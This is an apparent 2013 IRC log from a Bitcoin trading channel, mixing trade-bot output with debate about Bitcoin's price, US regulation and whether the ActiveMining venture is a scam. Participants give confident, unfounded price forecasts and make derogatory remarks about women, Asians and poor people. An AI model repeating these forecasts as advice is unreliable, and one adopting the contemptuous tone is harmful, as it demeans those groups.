[MPEX] [S.MPOE] 4419 @ 0.00084306 = 3.7255 BTC [+] Aug 18 23:04:58 but the current $100 is just too low Aug 18 23:05:22 global market cap is just way way too low for a technology like this Aug 18 23:07:38 go baby go Aug 18 23:07:40 go baby go Aug 18 23:08:10 mircea_popescu: 1Bitcoin is now the new eve cartel? What is dis? What happens when the old guns go to war with you? Aug 18 23:08:37 gecko_x8 "there's nothing". listen, there should be stuff under rather than in between Aug 18 23:08:48 what do you imagine supports 1k per each of 12mn btcs ? Aug 18 23:09:22 thestringpuller go to war, how ? Aug 18 23:13:36 mircea_popescu fear will support it Aug 18 23:13:53 not greed Aug 18 23:14:48 first the realization that cryptocurrencies ain't going away from this world ever again Aug 18 23:15:12 then the realization of the massive computing power it takes to create a bitcoin Aug 18 23:15:40 [BTCTC] [ACTIVEMINING] 68 @ 0.00544 = 0.3699 BTC [+] Aug 18 23:15:42 [BTCTC] [ACTIVEMINING] 50 @ 0.005444 = 0.2722 BTC [+] Aug 18 23:15:43 [BTCTC] [ACTIVEMINING] 18 @ 0.00545 = 0.0981 BTC [+] Aug 18 23:15:44 [BTCTC] [ACTIVEMINING] 30 @ 0.00545 = 0.1635 BTC [+] Aug 18 23:15:59 that wil stoke the fear necessary to get ppl to buy 1 coin for $1000 Aug 18 23:16:37 people don't have 1k. Aug 18 23:17:00 they have 100 Aug 18 23:17:06 so they will buy 0.1 Aug 18 23:17:30 the fixed costs of miners keep balooning. Aug 18 23:17:36 tghese have to be supported somehow Aug 18 23:17:45 there's a finite supply of cash in the hands of "people". Aug 18 23:17:57 difficulty can't continue to grow like this Aug 18 23:18:03 ofcourse Aug 18 23:18:08 that's impossible Aug 18 23:18:40 uyes well, it's either difficulty or price Aug 18 23:18:45 you'd prefer price, but it'll be difficulty. Aug 18 23:19:35 i think btc is going to 1000 much sooner than anyone can imagine Aug 18 23:19:43 but that's just my opinion Aug 18 23:20:44 [BTCTC] [ACTIVEMINING] 30 @ 0.005419 = 0.1626 BTC [-] Aug 18 23:20:47 gecko_x8: what is keeping congress from making it practically infeasible for any US company to do business in/with bitcoin within the next 6 months? Aug 18 23:21:01 [BTCTC] [ACTIVEMINING] 30 @ 0.005419 = 0.1626 BTC [-] Aug 18 23:21:12 what, us congress lol Aug 18 23:21:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005419 = 0.1626 BTC [-] Aug 18 23:21:30 they could not legislate themselves out of a paper bag in 100 years lol Aug 18 23:21:46 they will have absolutely no say Aug 18 23:21:54 theyǘe given fbi 120 days to issue a report of the security issues surrounding the currency. what is preventing a kind of knee-jerk legislative reaction disentivising us companies from using it? Aug 18 23:21:55 whatsoever Aug 18 23:22:20 bitcoin is largely US users is my understanding. if thereś a huge sellof of US users, what happens? Aug 18 23:22:25 bitcoin does not need companies Aug 18 23:22:32 okay okay Aug 18 23:22:34 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 18 23:22:42 gold doesn't need companies to trade it as well Aug 18 23:22:52 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 18 23:22:53 this is not about law Aug 18 23:23:00 it is about human psyche Aug 18 23:23:02 rephrase-- what if price drops to $10 after congress has hearings and issues legislation. Aug 18 23:23:09 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 18 23:23:18 [BTCTC] [ACTIVEMINING] 30 @ 0.005542 = 0.1663 BTC [+] Aug 18 23:23:26 [BTCTC] [DMS.MINING] 1 @ 0.003399 BTC [-] Aug 18 23:23:27 well price will never drop to 10 again, cause it costs more to mine it. Aug 18 23:23:29 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [-] Aug 18 23:23:42 thatś large scale mining though right? Aug 18 23:23:52 yes, and none of it happening in the us. Aug 18 23:23:59 [BTCTC] [ACTIVEMINING] 27 @ 0.005353 = 0.1445 BTC [-] Aug 18 23:24:04 basically the us congress is in the position of the fat girl. Aug 18 23:24:13 she can be as virtuous as she pleases, not like anyone's asking her out anyway Aug 18 23:24:15 if the us congress tries to publically ban btc it won't go to 1000, it will go to 10000 Aug 18 23:24:22 that's how it works Aug 18 23:24:26 common. Aug 18 23:24:31 how would you know how it works ? Aug 18 23:24:49 mass psychology man Aug 18 23:25:00 the mass you're discussing happens to be very poor. Aug 18 23:25:03 everyone is always trying to break free of their governments Aug 18 23:25:06 poor people don't matter. Aug 18 23:25:09 subconscially Aug 18 23:25:12 hmmm Aug 18 23:25:25 okay, i guess what iḿ really asking is this. Aug 18 23:25:49 if congress clamps down heavily, btc price would drop heavily in the short term right? Aug 18 23:25:50 then rise again? Aug 18 23:25:56 [BTCTC] [ACTIVEMINING] 11 @ 0.005354 = 0.0589 BTC [+] Aug 18 23:25:58 [BTCTC] [ACTIVEMINING] 18 @ 0.00535 = 0.0963 BTC [-] Aug 18 23:26:00 btc price has not much to do with the us. Aug 18 23:26:02 no. Aug 18 23:26:10 if china made mining illegal the price would probably drop noticeably. Aug 18 23:26:10 it would immediately explode Aug 18 23:26:16 but otherwise, the us is like togo. Aug 18 23:26:19 no. Aug 18 23:26:20 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [+] Aug 18 23:26:37 [BTCTC] [ACTIVEMINING] 30 @ 0.005398 = 0.1619 BTC [-] Aug 18 23:26:41 MP, ćause of asicminer? Aug 18 23:26:43 or what? Aug 18 23:26:47 [BTCTC] [ACTIVEMINING] 30 @ 0.005398 = 0.1619 BTC [-] Aug 18 23:27:04 [BTCTC] [ACTIVEMINING] 30 @ 0.005398 = 0.1619 BTC [-] Aug 18 23:27:16 [BTCTC] [ACTIVEMINING] 30 @ 0.005398 = 0.1619 BTC [-] Aug 18 23:27:17 it's very hard to explain, and i'm just an armchair, not an expert Aug 18 23:27:20 w_white not just asicminer. the azns have eaten the western lunch on this score. Aug 18 23:27:49 [BTCTC] [ACTIVEMINING] 1 @ 0.005399 BTC [+] Aug 18 23:27:59 w_white http://trilema.com/2013/the-future-of-bitcoin-regulation/ see that if you've not before Aug 18 23:28:03 but the very fact that you assume, along with the majority, that a us congress clampdown would affect the price atleast initially negatively Aug 18 23:28:17 [BTCTC] [ACTIVEMINING] 11 @ 0.005499 = 0.0605 BTC [+] Aug 18 23:28:23 that notion in itself makes the whole scenario impossible Aug 18 23:28:37 because the majority can never be on the winning side Aug 18 23:28:48 it's mathematically impossible Aug 18 23:29:00 that's pretty contorted reasoning. Aug 18 23:29:09 MP, didn know you had a blog. very nice. Aug 18 23:29:10 what if one night the majority assumes the sun will rise ? Aug 18 23:29:19 but that's just one small factor in a large complicated field of humman mass subconcious behaviour Aug 18 23:29:26 [HAVELOCK] [AM100] 4 @ 0.0365999 = 0.1464 BTC [-] Aug 18 23:29:29 w_white bunch of stuff in there, so. take your time. Aug 18 23:29:40 [BTCTC] [ACTIVEMINING] 68 @ 0.005497 = 0.3738 BTC [-] Aug 18 23:29:41 [BTCTC] [ACTIVEMINING] 8 @ 0.005498 = 0.044 BTC [+] Aug 18 23:29:42 [BTCTC] [ACTIVEMINING] 18 @ 0.0055 = 0.099 BTC [+] Aug 18 23:30:10 [HAVELOCK] [AM100] 17 @ 0.0364001 = 0.6188 BTC [-] Aug 18 23:30:28 [BTCTC] [ACTIVEMINING] 68 @ 0.005541 = 0.3768 BTC [+] Aug 18 23:30:38 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 18 23:30:40 iḿ invested in ActM, a company operating in US. thatś where most of my worry comes from. Aug 18 23:30:54 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 18 23:30:58 there is also the question of cycles and the baby boomers Aug 18 23:31:08 iḿ trying to figure out if i should cash out in the short term and wait for news. or wait til hearings. Aug 18 23:31:28 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 18 23:31:32 prolly some 85%+ of all the wealth in the western world is currently owned by ppl over 65 yrs Aug 18 23:31:40 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 18 23:31:45 gecko, thatś interesting. Aug 18 23:31:47 and they are way too selfish to turn it over the the next gen Aug 18 23:31:53 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 18 23:32:07 but the fact remains they will all die withing 10-15 years Aug 18 23:33:02 [HAVELOCK] [AM100] 3 @ 0.0365 = 0.1095 BTC [+] Aug 18 23:33:12 [HAVELOCK] [AM100] 17 @ 0.0364001 = 0.6188 BTC [-] Aug 18 23:33:33 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.001198 = 0.0036 BTC [+] Aug 18 23:33:54 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 23:34:16 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 23:34:31 [BTCTC] [ACTIVEMINING] 30 @ 0.005407 = 0.1622 BTC [-] Aug 18 23:34:32 [BTCTC] [ACTIVEMINING] 2 @ 0.005408 = 0.0108 BTC [+] Aug 18 23:34:40 if you are invested in activemining you should have more worries than that Aug 18 23:34:46 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [+] Aug 18 23:34:55 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [+] Aug 18 23:35:50 [BTCTC] [ACTIVEMINING] 30 @ 0.005542 = 0.1663 BTC [+] Aug 18 23:36:01 [BTCTC] [ACTIVEMINING] 30 @ 0.005543 = 0.1663 BTC [+] Aug 18 23:36:03 [BTCTC] [ACTIVEMINING] 38 @ 0.005542 = 0.2106 BTC [-] Aug 18 23:36:10 [HAVELOCK] [AM100] 16 @ 0.0364001 = 0.5824 BTC [-] Aug 18 23:36:26 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [-] Aug 18 23:36:45 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [-] Aug 18 23:36:57 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [-] Aug 18 23:37:11 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [-] Aug 18 23:37:13 [BTCTC] [ACTIVEMINING] 52 @ 0.005541 = 0.2881 BTC [-] Aug 18 23:37:50 a Aug 18 23:37:57 [BTCTC] [ACTIVEMINING] 3 @ 0.005341 = 0.016 BTC [-] Aug 18 23:37:58 [BTCTC] [ACTIVEMINING] 19 @ 0.00534 = 0.1015 BTC [-] Aug 18 23:38:06 w_white what, asicminer-fake is now operating ?! Aug 18 23:38:10 what's the operation exactly ? Aug 18 23:38:12 [HAVELOCK] [AM100] 1 @ 0.03621 BTC [-] Aug 18 23:38:14 [HAVELOCK] [AM100] 3 @ 0.03621 = 0.1086 BTC [-] Aug 18 23:38:32 weĺl know in a few weeks. Aug 18 23:38:54 so it's not operating, but maybe will in two weeks ? Aug 18 23:38:59 what sort of nonsense is this! Aug 18 23:39:06 iĺl make money once the eAsic deal is finalized, then again if/when they start producing. Aug 18 23:39:15 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [+] Aug 18 23:39:24 just buy a bridge already. Aug 18 23:39:26 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [+] Aug 18 23:39:42 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [+] Aug 18 23:39:43 preferably one that's not too far. Aug 18 23:39:47 can we keep the scamtalk out of here? Aug 18 23:39:57 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [+] Aug 18 23:39:59 this channel is for real legitimate assets Aug 18 23:39:59 so what if itś a scam. Aug 18 23:40:11 i wasn trying to sell anyone. Aug 18 23:40:11 [BTCTC] [ACTIVEMINING] 30 @ 0.005399 = 0.162 BTC [+] Aug 18 23:40:20 [HAVELOCK] [AM100] 1 @ 0.0376 BTC [+] Aug 18 23:40:24 this bot is prolly trading it's own bids and asks Aug 18 23:40:26 if it's a scam you're not in possesion of an investment, Aug 18 23:40:34 and consequently couldn't care less about stuff like the us congress Aug 18 23:40:37 or sanity, generally. Aug 18 23:41:56 [HAVELOCK] [AM100] 1 @ 0.0363 BTC [-] Aug 18 23:42:50 eAsic is a US company. theyŕe going to produce chips for actm regardless of actm being able to follow through on their other promises. Aug 18 23:42:59 [BTCTC] [ACTIVEMINING] 68 @ 0.005419 = 0.3685 BTC [+] Aug 18 23:43:46 i don know h ow congress decision will affect eAsic or actmś ability to do anything with the chips if eAsic comes through. Aug 18 23:44:01 [HAVELOCK] [XBOND] 39 @ 0.0011789 = 0.046 BTC [-] Aug 18 23:44:03 congress decided actm is a scam? Aug 18 23:44:53 no but i am worried a congress decision against bitcoin use in the US could affect actmś ability to work with eAsic or operate bitocin company on US soil. Aug 18 23:45:35 if thats the start of your concern regarding actm, I have some bad news Aug 18 23:47:04 I think actm is more likely to start 28nm hashing than anyone else atm. Aug 18 23:47:17 [BTCTC] [ACTIVEMINING] 30 @ 0.005491 = 0.1647 BTC [+] Aug 18 23:47:30 just question of whether its going to be in november or april... Aug 18 23:47:33 [BTCTC] [ACTIVEMINING] 30 @ 0.005491 = 0.1647 BTC [+] Aug 18 23:47:44 [BTCTC] [LABCOIN] 700 @ 0.001681 = 1.1767 BTC [-] Aug 18 23:47:45 [BTCTC] [LABCOIN] 2790 @ 0.001681 = 4.69 BTC [-] Aug 18 23:47:54 [BTCTC] [BTC-GROWTH] 3 @ 0.1015 = 0.3045 BTC [+] Aug 18 23:47:55 yeah, because words on a forum Aug 18 23:47:57 mircea_popescu: thanks for blog link. Aug 18 23:48:02 [BTCTC] [ACTIVEMINING] 30 @ 0.005491 = 0.1647 BTC [+] Aug 18 23:48:13 [BTCTC] [ACTIVEMINING] 30 @ 0.005491 = 0.1647 BTC [+] Aug 18 23:48:24 [BTCTC] [ACTIVEMINING] 30 @ 0.005491 = 0.1647 BTC [+] Aug 18 23:49:18 no, mostly because eAsic has confirmed theyŕe making chips for actm and theyŕe not a shitty company. Aug 18 23:49:42 link? Aug 18 23:49:52 it does not fucking matter Aug 18 23:50:00 activemining has nothing of value Aug 18 23:50:12 they're buying avalons and subcontracting their work. anyone can do that Aug 18 23:50:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 23:50:29 I think actm is more likely to start 28nm hashing than anyone else atm. << because why ?! Aug 18 23:50:33 and given their current valuation, shareholders are likely to get pretty much nothing as dividends Aug 18 23:50:35 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 23:50:46 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 23:50:49 I'd still like to see a link to comms from easic Aug 18 23:50:52 pankkake im fascinated by the entire thing i must confess. Aug 18 23:51:01 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 23:51:07 dub: one moment. Aug 18 23:51:11 i mean that tytus scammer started this fake thing with his 100th/picostocks pure imaginary thing Aug 18 23:51:15 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 23:51:16 and now six months later everyone;'s doing it Aug 18 23:51:18 I'm facinated that anyone could read teh actm OP and not draw teh conclusion that its writer is brain damaged Aug 18 23:51:58 dub that's exactly it tho. if we do the ratio of (how fucking stupid it is) vs (how influent), that shit is in a league with homer. Aug 18 23:52:11 cause while homer touched a lot further out, it was way way less stupid. and therefore... Aug 18 23:52:57 it's like crossing the east river in a peanut. way more than crossing the atlantic in any sort of actual ship. Aug 18 23:53:06 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 23:53:16 homer simpson? Aug 18 23:53:33 no, just homer. you know, like madonna. Aug 18 23:54:08 the guy who wrote the odyssey? Aug 18 23:54:22 [HAVELOCK] [AM1] 2 @ 3.99 = 7.98 BTC [+] Aug 18 23:54:24 [BTCTC] [ACTIVEMINING] 3 @ 0.0055 = 0.0165 BTC [-] Aug 18 23:54:29 yes. Aug 18 23:54:32 [HAVELOCK] [LABCO] 77 @ 0.001799 = 0.1385 BTC [+] Aug 18 23:54:34 [BTCTC] [LABCOIN] 30 @ 0.001687 = 0.0506 BTC [+] Aug 18 23:54:35 [BTCTC] [LABCOIN] 20 @ 0.001688 = 0.0338 BTC [+] Aug 18 23:54:36 [BTCTC] [LABCOIN] 400 @ 0.00169 = 0.676 BTC [+] Aug 18 23:54:38 [BTCTC] [LABCOIN] 1000 @ 0.001692 = 1.692 BTC [+] Aug 18 23:54:39 [BTCTC] [LABCOIN] 1000 @ 0.001694 = 1.694 BTC [+] Aug 18 23:54:40 [BTCTC] [LABCOIN] 10000 @ 0.001695 = 16.95 BTC [+] Aug 18 23:54:41 [BTCTC] [LABCOIN] 191 @ 0.001698 = 0.3243 BTC [+] Aug 18 23:54:42 [BTCTC] [LABCOIN] 17359 @ 0.0017 = 29.5103 BTC [+] Aug 18 23:54:53 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 23:55:09 we need more bets on scammers Aug 18 23:55:11 vote with your money Aug 18 23:55:12 [HAVELOCK] [AM100] 3 @ 0.0376 = 0.1128 BTC [+] Aug 18 23:55:13 [HAVELOCK] [AM100] 16 @ 0.0376999 = 0.6032 BTC [+] Aug 18 23:55:15 [HAVELOCK] [AM100] 4 @ 0.0377 = 0.1508 BTC [+] Aug 18 23:55:17 .d Aug 18 23:55:17 [HAVELOCK] [AM100] 5 @ 0.0378 = 0.189 BTC [+] Aug 18 23:55:19 50810339.04828 | Next Diff in 1116 blocks | Estimated Change: 22.3286% in 6d 0h 19m 8s Aug 18 23:55:19 [HAVELOCK] [AM100] 5 @ 0.0378 = 0.189 BTC [+] Aug 18 23:55:21 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 23:55:22 [HAVELOCK] [AM100] 5 @ 0.0379 = 0.1895 BTC [+] Aug 18 23:55:24 [HAVELOCK] [AM100] 10 @ 0.0379 = 0.379 BTC [+] Aug 18 23:55:26 [HAVELOCK] [AM100] 5 @ 0.038 = 0.19 BTC [+] Aug 18 23:55:28 [HAVELOCK] [AM100] 10 @ 0.038 = 0.38 BTC [+] Aug 18 23:55:28 thestringpuller well part of the beauty is that the fake exchanges have no shorting in place, and so... Aug 18 23:55:30 [HAVELOCK] [AM100] 45 @ 0.038 = 1.71 BTC [+] Aug 18 23:55:32 [HAVELOCK] [AM100] 10 @ 0.0382 = 0.382 BTC [+] Aug 18 23:55:33 [HAVELOCK] [AM100] 10 @ 0.0384 = 0.384 BTC [+] Aug 18 23:55:34 that ken slaughter guy from actm is a total nimrod. Aug 18 23:55:35 [HAVELOCK] [AM100] 7 @ 0.0385899 = 0.2701 BTC [+] Aug 18 23:55:37 [HAVELOCK] [AM100] 10 @ 0.0386 = 0.386 BTC [+] Aug 18 23:55:39 [HAVELOCK] [AM100] 10 @ 0.0388 = 0.388 BTC [+] Aug 18 23:55:41 [HAVELOCK] [AM100] 70 @ 0.0388 = 2.716 BTC [+] Aug 18 23:55:43 [HAVELOCK] [AM100] 12 @ 0.03889 = 0.4667 BTC [+] Aug 18 23:55:45 [HAVELOCK] [AM100] 138 @ 0.03899 = 5.3806 BTC [+] Aug 18 23:55:47 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 23:55:50 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [+] Aug 18 23:56:09 doesn't that just make the issue worse on all fronts? Aug 18 23:56:20 dub: all i can find atm is the NDA from eAsic, on this page: https://bitcointalk.org/index.php?topic=254930.0 Aug 18 23:56:22 having no shorting means no bets can be placed against le-scammors Aug 18 23:56:35 Rawted i love that word, nimrod. to quote ud, "The Bible ONLY mentions that Nimrod was a son of Cush, the founder of Babylon, and a mighty hunter. Curiously enough, Dictionary.com attests definition 2 to have derived from a Looney Toons episode, wherein Bugs Bunny mocks his adversary, the hunter Elmer Fudd, calling him a "poor little Nimrod". Warner Brothers' Looney Toons cartoons were not written for children, but for Aug 18 23:56:35 literate adults, and often contained literary references children would not understand. Younger generations, mostly illiterate, and having little or no Bible knowledge not gleaned from their moronic parents and half-wit talk radio hosts, probably misunderstood the comment as being a general insult describing the slow-witted Fudd." Aug 18 23:56:36 [HAVELOCK] [AM1] 2 @ 4.09 = 8.18 BTC [+] Aug 18 23:56:39 [BTCTC] [ACTIVEMINING] 9 @ 0.0055 = 0.0495 BTC [-] Aug 18 23:56:50 thestringpuller exactly. Aug 18 23:57:00 w_white: so an anonymous internet post Aug 18 23:57:37 eAsic has also confirmed via email a few times that theyŕe under NDA with actm. Aug 18 23:57:44 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 23:57:48 ítś buried somewhere in the thread a few times. Aug 18 23:57:57 too bad the rich people have better things to do with their time than place bets against scammors, otherwise I'd say there could be a lucrative business in a set of bitbet's predicting the failure of scammors on the play exchanges Aug 18 23:57:58 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 23:58:06 w_white: so fucking what? Aug 18 23:58:11 "The ACTM's team can not run Avalon chips in full speed with everything needed opensourced by Avalon. What do you expect from them when it comes to get their own 28nm super super chips running?" Aug 18 23:58:15 hahahahaha Aug 18 23:58:21 thestringpuller actually some rich people do try to involve themselves. Aug 18 23:58:22 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 23:58:29 oh? Aug 18 23:58:30 however, the scammors are notoriously difficult to pin down. Aug 18 23:58:35 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 23:58:46 consider the case of the original basic. forum idiots are STILL arguing with my girl over it. Aug 18 23:58:46 [BTCTC] [BTC-GROWTH] 3 @ 0.1003 = 0.3009 BTC [-] Aug 18 23:58:49 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 18 23:59:04 that scam is directly linked to the tytus picostocks scam, which is the originator of pretty much all the current gems. Aug 18 23:59:11 WTF is it with the 30 actm shares Aug 18 23:59:37 so you think the NDA is real, but it regards something not related to 28nm chip production? Aug 18 23:59:38 fuck it, nite Aug 19 00:00:03 i honestly never thought of it. Aug 19 00:00:06 w_white jay and silent bob could sign a nda about 28 nm chip production. Aug 19 00:00:08 so waht of it ? Aug 19 00:00:09 mircea_popescu: if we go buy your bitcoin drama timeline, it seems that even those considered "functional" (bad word I know) such as Diablo-D3 are technically scammors Aug 19 00:00:20 [BTCTC] [ACTIVEMINING] 19 @ 0.00557 = 0.1058 BTC [+] Aug 19 00:00:25 by* Aug 19 00:00:35 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [-] Aug 19 00:00:35 thestringpuller: wait, what? Aug 19 00:00:49 nah, the core issue here is that we have a group of people who have pretty much got the forum/reddit retard's number Aug 19 00:00:53 [BTCTC] [ACTIVEMINING] 30 @ 0.005542 = 0.1663 BTC [+] Aug 19 00:00:53 and they're making these shits to order. Aug 19 00:00:56 why are you dragging me into this Aug 19 00:01:08 w_white: you seem to be satisfied at "things exist". your question should be "are things going to work? am i going to get something out of it?" Aug 19 00:01:25 [BTCTC] [ACTIVEMINING] 30 @ 0.005543 = 0.1663 BTC [+] Aug 19 00:01:36 pankkake: for me personally i am not betting on things working. Aug 19 00:01:42 hey man I'm just going by the trilema article Aug 19 00:01:43 Late September 2012 Patrick McFarland aka DiabloD3xxii came up with the idea of a .million BTC company. sometime in April. This was going to be some sort of mining venture then modified to datacenter then eventually further modified to include electricity generation and other lines. Aug 19 00:01:46 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [-] Aug 19 00:01:48 The subsequent GLBSE ipo yielded roughly 10k BTC for 10k shares. Unable to complete the original plan McFarland devised his own system for valuating miner bonds and proceeded to trade on the open market according to it, impervious to warnings that both his system was broken and that in any event his implementation is defective. Aug 19 00:01:49 w_white: have you seen anything about the NDA other than a guy on a forum mentioning an NDA? Aug 19 00:01:53 Once he unavoidably ran out of cash he proceeded to issue more shares, deeply diluting existing shareholders (new shares were issued for values at times below even 1% of what early investors had paid). Eventually GLBSE took control of the asset and forced a motion. At the time GLBSE management was acting in such an inept and erratic manner however (delisting spontaneously some other asset) that McFarland was retu Aug 19 00:02:06 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [-] Aug 19 00:02:21 dub ndas are cool tho Aug 19 00:02:22 dub: yes, easic has confirmed it in email to several users on the forum, stating that theyŕe in business with VMC but are under NDA. Aug 19 00:02:40 mircea_popescu what do you mean by people have their "number"? Aug 19 00:02:43 like a musical number? Aug 19 00:02:59 w_white: which forum users? anyone that has been around longer than 'Ken' himself? I presume you are aware taht creating a forum account doesnt cost anything Aug 19 00:03:17 thestringpuller like if you know a chick loves to be complimented and will do anything if you tell her she's smart. you have her number. Aug 19 00:03:18 dub: youŕe right. i could be wrong. i can call them myself. Aug 19 00:03:36 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:03:40 let's give the guy more blog links then Aug 19 00:03:49 w_white http://trilema.com/2013/the-anatomy-of-another-scam/ Aug 19 00:03:53 same MO, different name. Aug 19 00:04:06 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:04:19 erryday Aug 19 00:04:31 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:04:48 [BTCTC] [TAT.ASICMINER] 7 @ 0.03806 = 0.2664 BTC [+] Aug 19 00:05:20 what's with all the funny letters anyway ? ŕ wtf s that Aug 19 00:05:29 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:05:39 i have been wondering that myself. Aug 19 00:05:49 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:05:50 mircea_popescu then it seems it's only a matter of time before the people willing to give up their number realize their suitor doesn't have a real job, and works at mcdonalds - yet tells girls he's a 4 star chef Aug 19 00:05:51 new keyboard, UK version of windows. Aug 19 00:06:02 and if not they go broke Aug 19 00:06:04 [BTCTC] [LABCOIN] 2 @ 0.001695 = 0.0034 BTC [-] Aug 19 00:06:24 [MPEX] [S.MPOE] 4150 @ 0.00084306 = 3.4987 BTC [+] Aug 19 00:06:39 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 19 00:06:43 thestringpuller you familiar with the infinite hitpoints problem ? Aug 19 00:07:12 not quite sure? care to elaborate a bit? Aug 19 00:07:18 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 19 00:07:37 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [+] Aug 19 00:07:42 [HAVELOCK] [AM100] 1 @ 0.03899 BTC [+] Aug 19 00:07:45 http://trilema.com/the-story-of-pointless-and-witless Aug 19 00:07:46 [BTCTC] [ACTIVEMINING] 3 @ 0.00561 = 0.0168 BTC [+] Aug 19 00:07:52 The story of Pointless and Witless pe Trilema - Un blog de Mircea Popescu. Aug 19 00:07:55 mircea_popescu i'm yet to read your articles, altough i'm aware of them and planning to read.. Aug 19 00:08:05 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [-] Aug 19 00:08:15 gecko_x8 that's ok, not like trilema is going anywhere. Aug 19 00:08:16 [BTCTC] [ACTIVEMINING] 30 @ 0.005541 = 0.1662 BTC [-] Aug 19 00:08:25 but what do you think of this 30 actm share shit? innocent bot or manipulation? Aug 19 00:08:53 oh yea, I remember that. pretty much akin to "there will always be soldiers at an army base" Aug 19 00:08:58 exactly. Aug 19 00:09:03 there will always be stupid people willing to die Aug 19 00:09:05 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:09:10 gecko_x8 i have no idea tbh. Aug 19 00:09:15 thus stupid people have infinite hitpoints, yea, so you think that is the case here? Aug 19 00:09:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:09:26 besides, how is that ever distinguished ? what draws the line between innocent and manipulative ? one's own preferences ? Aug 19 00:09:33 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:09:45 right.. but look at it Aug 19 00:09:51 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:09:57 thestringpuller yes. there's this deeply entrenched mentality of stupid, in the us. it manifests as people spend 50 bux ior w/e for half a btc, and then proceed to know better than anyone Aug 19 00:10:12 ESPECIALLY than anyone who isn't impressed with how smart, unique special and important they are Aug 19 00:10:14 just like everyone else. Aug 19 00:10:23 [BTCTC] [ACTIVEMINING] 30 @ 0.005409 = 0.1623 BTC [-] Aug 19 00:10:59 seeing how the us pays welfare to about 100 mn people each month, and seeing how the forum population is in the thousands we basically have an infinite supply of people who think they know better, and are too stupid to even suspect otherwise. Aug 19 00:11:07 [BTCTC] [ACTIVEMINING] 30 @ 0.005542 = 0.1663 BTC [+] Aug 19 00:11:07 however it seems like the infinite hit points phenomenon, stupid people always seem to have money (be it from the socialized welfare et. al) Aug 19 00:11:17 well, money. they have enough for a pizza. Aug 19 00:11:41 [BTCTC] [ACTIVEMINING] 30 @ 0.005542 = 0.1663 BTC [+] Aug 19 00:11:52 it's only recently that very cheeky scammors have begun to actually take the pretense to relevancy. Aug 19 00:11:53 